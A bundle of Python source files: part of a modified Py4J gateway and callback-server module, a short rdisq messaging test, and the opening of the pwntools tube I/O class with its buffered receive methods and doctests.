self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
self.sessions_pool.put(GatewaySession(gateway_client, self.gateway_property.pool, self.jvm))
@classmethod
def setup_gateway_client(cls, gateway_client):
if gateway_client.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
return gateway_client
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def get_callback_server(self):
return self._callback_server
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = self._create_callback_server(
callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def _create_callback_server(self, callback_server_parameters):
callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters,
sessions_pool=self.sessions_pool)
return callback_server
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
return JavaGateway.make_new_jvm_view(self._gateway_client,name)
@classmethod
def make_new_jvm_view(cls,gateway_client,name="custom jvm",id=None):
command = proto.JVMVIEW_COMMAND_NAME + \
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME + \
get_command_part(name) + \
proto.END_COMMAND_PART
logger.info("Creating new JVM for "+str(gateway_client.address)+":"+str(gateway_client.port))
answer = gateway_client.send_command(command)
java_object = get_return_value(answer, gateway_client)
return JVMView(
gateway_client=gateway_client, jvm_name=name,
jvm_object=java_object,id=id)
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def close_callback_server(self, raise_exception=False):
"""Closes the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`
connections.
:param raise_exception: If `True`, raise an exception if an error
occurs while closing the callback server connections
(very likely with sockets).
"""
if self._callback_server is None:
# Nothing to shutdown
return
try:
self._callback_server.close()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while closing callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(
self, keep_callback_server=False,
close_callback_server_connections=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down. Mutually exclusive with
close_callback_server_connections.
:param close_callback_server_connections: if `True`, close all
callback server connections.
"""
self._gateway_client.close()
if not keep_callback_server:
deprecated(
"JavaGateway.close.keep_callback_server", "1.0",
"JavaGateway.shutdown_callback_server")
self.shutdown_callback_server()
elif close_callback_server_connections:
self.close_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
is garbage collected on the Python side. This method, or gc.collect()
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True, java_path="java",
create_new_process_group=False, enable_auth=False):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but in case of errors related
to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if
$JAVA_HOME is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies,
the Java process will stay alive, which may be a problem for some
scenarios though.
:param enable_auth: If True, the server will require clients to provide
an authentication token when connecting.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_ret = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect, java_path=java_path,
create_new_process_group=create_new_process_group,
enable_auth=enable_auth)
if enable_auth:
_port, _auth_token = _ret
else:
_port, _auth_token = _ret, None
gateway = JavaGateway(
gateway_parameters=GatewayParameters(port=_port,
auth_token=_auth_token))
return gateway
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None,
sessions_pool=None):
"""
:param pool: the pool responsible of tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.sessions_pool = sessions_pool
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.ssl_context = self.callback_server_parameters.ssl_context
self.pool = pool
self.connections = weakref.WeakSet()
# Lock is used to isolate critical region like connection creation.
# Some code can produce exceptions when ran in parallel, but
# They will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
self.is_shutting_down = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.server_socket = socket.socket(af_type, socket.SOCK_STREAM)
set_reuse_address(self.server_socket)
try:
self.server_socket.bind((self.address, self.port))
# 4-tuple for ipv6, 2-tuple for ipv4
info = self.server_socket.getsockname()
self._listening_address = info[0]
self._listening_port = info[1]
except Exception as e:
msg = "An error occurred while trying to start the callback "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
# Maybe thread needs to be cleanup up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def get_listening_port(self):
"""Returns the port on which the callback server is listening to.
Different than `port` when port is 0.
"""
return self._listening_port
def get_listening_address(self):
"""Returns the address on which the callback server is listening to.
May be different than `address` if `address` was an alias (e.g.,
localhost).
"""
return self._listening_address
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
server_started.send(
self, server=self)
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [],
self.callback_server_parameters.accept_timeout)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
if self.callback_server_parameters.read_timeout:
socket_instance.settimeout(
self.callback_server_parameters.read_timeout)
if self.ssl_context:
socket_instance = self.ssl_context.wrap_socket(
socket_instance, server_side=True)
input = socket_instance.makefile("rb")
connection = CallbackServer._create_connection(
socket_instance, input, self.pool,
self.gateway_client,self.callback_server_parameters,
self)
with self.lock:
if not self.is_shutdown:
self.connections.add(connection)
connection.start()
server_connection_started.send(
self, connection=connection)
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception as e:
if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
server_connection_error.send(
self, error=e)
logger.exception("Error while waiting for a connection.")
server_stopped.send(self, server=self)
@classmethod
def _create_connection(cls, socket_instance, stream, pool, gateway_client,
callback_server_parameters, callback_server):
connection = CallbackConnection(
pool, stream, socket_instance, gateway_client,
callback_server_parameters, callback_server)
return connection
def close(self):
"""Closes all active callback connections
"""
logger.info("Closing down callback connections from CallbackServer")
with self.lock:
temp_connections = list(self.connections)
for connection in temp_connections:
quiet_close(connection)
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
pre_server_shutdown.send(self, server=self)
with self.lock:
try:
if self.is_shutting_down:
# Do not allow calling shutdown while shutdown is
# executing. Alternative would be to not use a
# reentrant lock, but we
# would need to check all the other uses of this lock.
return
self.is_shutting_down = True
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
temp_connections = list(self.connections)
for connection in temp_connections:
connection.close()
self.pool.clear()
finally:
self.is_shutting_down = False
self.thread.join()
self.thread = None
post_server_shutdown.send(self, server=self)
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters, callback_server):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
# TODO Remove in 1.0. Take it from the callback_server directly
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# TODO Remove in 1.0. This should never be the case.
self.callback_server_parameters = CallbackServerParameters()
self.callback_server = callback_server
self.daemon = self.callback_server_parameters.daemonize_connections
def end(self):
ret = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(self.ident),
ctypes.py_object(Py4JThreadCancelledError))
if ret == 0:
raise ValueError("Invalid thread ID {}".format(self.ident))
elif ret > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(self.ident), None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def run(self):
logger.info("Callback Connection ready to receive messages, thread %d" % self.ident)
reset = False
authenticated = self.callback_server_parameters.auth_token is None
try:
while True:
command = smart_decode(self.input.readline())[:-1]
if not authenticated:
token = self.callback_server_parameters.auth_token
# Will raise an exception if auth fails in any way.
authenticated = do_client_auth(
command, self.input, self.socket, token)
continue
self.socket.sendall(("%d\n" % self.ident).encode("utf-8")) # send thread ident
if command.strip('\r') == proto.SERVER_STATUS_COMMAND_NAME:
info = self.build_info()
self.socket.sendall(
get_command_part(json.dumps(info))[1:].encode("utf-8")
)
reset = True
continue
if command.strip('\r') == proto.KILL_THREAD_COMMAND_NAME:
# retrieve the target thread ident
target_ident = int(smart_decode(self.input.readline())[:-1])
resp = proto.ERROR_RETURN_MESSAGE
# retrieve the target thread from the callback server connections
for connection in self.callback_server.connections:
if connection.ident == target_ident:
# and kill it if not dead
logger.info("Cancelling %d" % connection.ident)
connection.end()
resp = proto.SUCCESS_RETURN_MESSAGE
# reply
self.socket.sendall(resp.encode("utf-8"))
reset = True
continue
if command == '':
break
java_address = self.socket.getpeername()[0]
java_port = int(smart_decode(self.input.readline())[:-1])
if (self.gateway_client.address != java_address or
self.gateway_client.port != java_port):
# try to get a gateway client from pool
try:
_id = GatewaySessionPool.id_for(java_address, java_port)
if _id in self.callback_server.sessions_pool.keys():
session = self.callback_server.sessions_pool[_id]
logger.info("Reusing session : "+_id)
self.gateway_client = session.gateway_client
self.pool = session.pool
self.jvm = session.jvm
else:
logger.info("Creating a new connection session from "+str(java_address)+":"+str(java_port))
session = GatewayClient.build_new_session(java_address,
java_port,
self.gateway_client,
self.callback_server.pool)
self.callback_server.sessions_pool.put(session)
self.gateway_client = session.gateway_client
self.pool = session.pool
self.jvm = session.jvm
except Exception as e:
logger.error("Error while setting up session: ")
logger.exception(e)
raise e
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
logger.info("Garbage collecting on %s" % str(obj_id))
_garbage_collect_proxy(self.pool, obj_id)
self.socket.sendall(
proto.SUCCESS_RETURN_MESSAGE.encode("utf-8"))
else:
logger.error("Unknown command {0}".format(command))
# We're sending something to prevent blocking, but at this
# point, the protocol is broken.
self.socket.sendall(
proto.ERROR_RETURN_MESSAGE.encode("utf-8"))
except Py4JAuthenticationError:
reset = True
logger.exception("Could not authenticate connection.")
except socket.timeout:
reset = True
logger.info(
"Timeout while callback connection was waiting for"
"a message", exc_info=True)
except Py4JThreadCancelledError as e:
reset = True
logger.info("Request %d has been cancelled" % self.ident)
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
self.close(reset)
def close(self, reset=False):
try:
logger.info("Closing down callback connection to %s" % str(self.socket.getpeername()))
except Exception:
logger.info("Closing down (dead?) connection")
if reset:
set_linger(self.socket)
else:
# Send shutdown before closing stream and socket
quiet_shutdown(self.socket)
quiet_close(self.input)
quiet_close(self.socket)
already_closed = self.socket is None
self.socket = None
self.input = None
if not already_closed:
server_connection_stopped.send(
self.callback_server, connection=self)
def _call_proxy(self, obj_id, input):
if obj_id not in self.pool:
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part('Object ID unknown', self.pool)
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return proto.RETURN_MESSAGE + proto.SUCCESS +\
get_command_part(return_value, self.pool)
except Exception as e:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
if self.callback_server_parameters.propagate_java_exceptions and\
isinstance(e, Py4JJavaError):
java_exception = e.java_exception
else:
java_exception = traceback.format_exc()
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part(java_exception, self.pool)
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
def build_info(self):
info = {}
connections_shadow = []
connections_active = []
threads = sys._current_frames()
for connection in self.callback_server.connections:
connection_description = dict()
connection_description['id'] = str(connection)
connection_description['thread_name'] = connection.name
connection_description['thread_id'] = connection.ident
stack = traceback.extract_stack(threads.get(connection.ident))
connection_description['thread_stack'] = traceback.format_list(stack)
connection_description['gatewayClient'] = connection.gateway_client.build_info()
connection_description['address'] = connection.gateway_client.address
connection_description['port'] = connection.gateway_client.port
connection_description['nObjects'] = len(connection.pool)
connection_description['isAlive'] = connection.isAlive()
connection_description['pool'] = str(connection.pool)
connection_description['objects'] = connection.pool.build_objects_info()
if connection.isAlive():
connections_active.append(connection_description)
else:
connections_shadow.append(connection_description)
info['nConnections'] = len(self.callback_server.connections)
info['nActiveConnections'] = len(connections_active)
info['nShadowConnections'] = len(connections_shadow)
info['activeConnections'] = connections_active
#info['shadowConnections'] = connections_shadow
info_server = dict()
info_server['gatewayClient'] = self.gateway_client.build_info()
info_server['nObjects'] = len(self.pool)
info_server['objects'] = self.pool.build_objects_info()
info_server['pool'] = str(self.pool)
info_server['sessions_pool'] = self.callback_server.sessions_pool.build_info()
info['server'] = info_server
return info
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object, force_id=None):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
if force_id:
id = force_id
else:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
def build_objects_info(self):
dict_objects = []
for key in self.dict.keys():
dict_objects.append({'id': key, 'obj': str(self.dict[key])})
return dict_objects
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
test_convenience_methods.py
|
"""Test convenience methods that save the need for stuff such as instantiating factories"""
from threading import Thread
from typing import *
from rdisq.request.receiver import RegisterMessage
from tests._messages import AddMessage
if TYPE_CHECKING:
from tests.conftest import _RdisqMessageFixture
def test_send_sync(rdisq_message_fixture: "_RdisqMessageFixture"):
rdisq_message_fixture.spawn_receiver()
r = RegisterMessage(AddMessage, {}).send_async()
rdisq_message_fixture.process_all_receivers()
assert AddMessage in r.wait()
def test_send_async(rdisq_message_fixture: "_RdisqMessageFixture"):
receiver = rdisq_message_fixture.spawn_receiver()
Thread(group=None, target=receiver.process).start()
assert AddMessage in RegisterMessage(AddMessage, {}).send_and_wait()
rdisq_message_fixture.kill_all()
|
tube.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import re
import string
import subprocess
import sys
import threading
import time
from pwnlib import atexit
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.timeout import Timeout
from pwnlib.tubes.buffer import Buffer
from pwnlib.util import fiddling
from pwnlib.util import misc
from pwnlib.util import packing
class tube(Timeout, Logger):
"""
Container of all the tube functions common to sockets, TTYs and SSH connetions.
"""
default = Timeout.default
forever = Timeout.forever
#: Delimiter to use for :meth:`sendline`, :meth:`recvline`,
#: and related functions.
newline = '\n'
def __init__(self, timeout = default, level = None, *a, **kw):
super(tube, self).__init__(timeout)
Logger.__init__(self, None)
if level is not None:
self.setLevel(level)
self.buffer = Buffer(*a, **kw)
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = None, timeout = default):
r"""recv(numb = 4096, timeout = default) -> str
Receives up to `numb` bytes of data from the tube, and returns
as soon as any quantity of data is available.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> # Fake a data source
>>> t.recv_raw = lambda n: 'Hello, world'
>>> t.recv() == 'Hello, world'
True
>>> t.unrecv('Woohoo')
>>> t.recv() == 'Woohoo'
True
>>> with context.local(log_level='debug'):
... _ = t.recv() # doctest: +ELLIPSIS
[...] Received 0xc bytes:
'Hello, world'
"""
numb = self.buffer.get_fill_size(numb)
return self._recv(numb, timeout) or ''
def unrecv(self, data):
"""unrecv(data)
Puts the specified data back at the beginning of the receive
buffer.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'hello'
>>> t.recv()
'hello'
>>> t.recv()
'hello'
>>> t.unrecv('world')
>>> t.recv()
'world'
>>> t.recv()
'hello'
"""
self.buffer.unget(data)
def _fillbuffer(self, timeout = default):
"""_fillbuffer(timeout = default)
Fills the internal buffer from the pipe, by calling
:meth:`recv_raw` exactly once.
Returns:
The bytes of data received, or ``''`` if no data was received.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda *a: 'abc'
>>> len(t.buffer)
0
>>> t._fillbuffer()
'abc'
>>> len(t.buffer)
3
"""
data = ''
with self.local(timeout):
data = self.recv_raw(self.buffer.get_fill_size())
if data and self.isEnabledFor(logging.DEBUG):
self.debug('Received %#x bytes:' % len(data))
if len(set(data)) == 1 and len(data) > 1:
self.indented('%r * %#x' % (data[0], len(data)), level = logging.DEBUG)
elif all(c in string.printable for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
if data:
self.buffer.add(data)
return data
def _recv(self, numb = None, timeout = default):
"""_recv(numb = 4096, timeout = default) -> str
Receives one chunk of from the internal buffer or from the OS if the
buffer is empty.
"""
numb = self.buffer.get_fill_size(numb)
data = ''
# No buffered data, could not put anything in the buffer
# before timeout.
if not self.buffer and not self._fillbuffer(timeout):
return ''
return self.buffer.get(numb)
def recvpred(self, pred, timeout = default):
"""recvpred(pred, timeout = default) -> str
Receives one byte at a time from the tube, until ``pred(bytes)``
evaluates to True.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call, with the currently-accumulated data.
timeout(int): Timeout for the operation
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
"""
data = ''
with self.countdown(timeout):
while not pred(data):
try:
res = self.recv(1)
except Exception:
self.unrecv(data)
return ''
if res:
data += res
else:
self.unrecv(data)
return ''
return data
def recvn(self, numb, timeout = default):
"""recvn(numb, timeout = default) -> str
Receives exactly `n` bytes.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> data = 'hello world'
>>> t.recv_raw = lambda *a: data
>>> t.recvn(len(data)) == data
True
>>> t.recvn(len(data)+1) == data + data[0]
True
>>> t.recv_raw = lambda *a: None
>>> # The remaining data is buffered
>>> t.recv() == data[1:]
True
>>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a'
>>> t.recvn(10, timeout=0.05)
''
>>> t.recvn(10, timeout=0.06) # doctest: +ELLIPSIS
'aaaaaa...'
"""
# Keep track of how much data has been received
# It will be pasted together at the end if a
# timeout does not occur, or put into the tube buffer.
with self.countdown(timeout):
while self.countdown_active() and len(self.buffer) < numb and self._fillbuffer(self.timeout):
pass
if len(self.buffer) < numb:
return ''
return self.buffer.get(numb)
def recvuntil(self, delims, drop=False, timeout = default):
"""recvuntil(delims, timeout = default) -> str
Receive data until one of `delims` is encountered.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
arguments:
delims(str,tuple): String of delimiters characters, or list of delimiter strings.
drop(bool): Drop the ending. If :const:`True` it is removed from the end of the return value.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello World!"
>>> t.recvuntil(' ')
'Hello '
>>> _=t.clean(0)
>>> # Matches on 'o' in 'Hello'
>>> t.recvuntil(tuple(' Wor'))
'Hello'
>>> _=t.clean(0)
>>> # Matches expressly full string
>>> t.recvuntil(' Wor')
'Hello Wor'
>>> _=t.clean(0)
>>> # Matches on full string, drops match
>>> t.recvuntil(' Wor', drop=True)
'Hello'
>>> # Try with regex special characters
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello|World"
>>> t.recvuntil('|', drop=True)
'Hello'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
# Longest delimiter for tracking purposes
longest = max(map(len, delims))
# Cumulative data to search
data = []
top = ''
with self.countdown(timeout):
while self.countdown_active():
try:
res = self.recv(timeout=self.timeout)
except Exception:
self.unrecv(''.join(data) + top)
raise
if not res:
self.unrecv(''.join(data) + top)
return ''
top += res
start = len(top)
for d in delims:
j = top.find(d)
if start > j > -1:
start = j
end = j + len(d)
if start < len(top):
self.unrecv(top[end:])
if drop:
top = top[:start]
else:
top = top[:end]
return ''.join(data) + top
if len(top) > longest:
i = -longest - 1
data.append(top[:i])
top = top[i:]
return ''
def recvlines(self, numlines=2**20, keepends = False, timeout = default):
r"""recvlines(numlines, keepends = False, timeout = default) -> str list
Receive up to ``numlines`` lines.
A "line" is any sequence of bytes terminated by the byte sequence
set by :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
numlines(int): Maximum number of lines to receive
keepends(bool): Keep newlines at the end of each line (:const:`False`).
timeout(int): Maximum timeout
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: '\n'
>>> t.recvlines(3)
['', '', '']
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\n'
>>> t.recvlines(3)
['Foo', 'Bar', 'Baz']
>>> t.recvlines(3, True)
['Foo\n', 'Bar\n', 'Baz\n']
"""
lines = []
with self.countdown(timeout):
for _ in xrange(numlines):
try:
# We must set 'keepends' to True here so that we can
# restore the original, unmodified data to the buffer
# in the event of a timeout.
res = self.recvline(keepends=True, timeout=timeout)
except Exception:
self.unrecv(''.join(lines))
raise
if res:
lines.append(res)
else:
break
if not keepends:
lines = [line.rstrip(self.newline) for line in lines]
return lines
def recvline(self, keepends = True, timeout = default):
r"""recvline(keepends = True) -> str
Receive a single line from the tube.
A "line" is any sequence of bytes terminated by the byte sequence
set in :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
keepends(bool): Keep the line ending (:const:`True`).
timeout(int): Timeout
Return:
All bytes received over the tube until the first
newline ``'\n'`` is received. Optionally retains
the ending.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\r\nBaz\n'
>>> t.recvline()
'Foo\n'
>>> t.recvline()
'Bar\r\n'
>>> t.recvline(keepends = False)
'Baz'
>>> t.newline = '\r\n'
>>> t.recvline(keepends = False)
'Foo\nBar'
"""
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
def recvline_pred(self, pred, keepends = False, timeout = default):
r"""recvline_pred(pred, keepends = False) -> str
Receive data until ``pred(line)`` returns a truthy value.
Drop all other data.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call. Returns the line for which
this function returns :const:`True`.
Examples:
>>> t = tube()
